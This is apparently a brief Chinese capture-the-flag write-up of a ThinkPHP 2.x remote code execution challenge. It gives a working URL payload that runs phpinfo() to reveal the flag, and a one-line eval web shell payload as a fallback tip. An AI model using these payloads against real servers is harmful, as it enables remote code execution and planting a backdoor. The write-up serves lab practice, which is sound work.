[ThinkPHP]2-Rce 1

[ThinkPHP]2-Rce 1

启动实例发现是一个ThinkPHP的示例代码，根据题目判断这题为RCE

扫描器扫描，未发现存在的REC漏洞（根据题目以及扫描结果猜想，可能是2.x版本的rec）

构造payload,成功显示phpinfo页面

?s=/index/index/name/${phpinfo()}

唱跳rap篮球+F，直接找到flag

tips.有时候在phpinfo找不到，可以采用一句话木马形式

?s=/index/index/name/${@eval($_POST[123456])}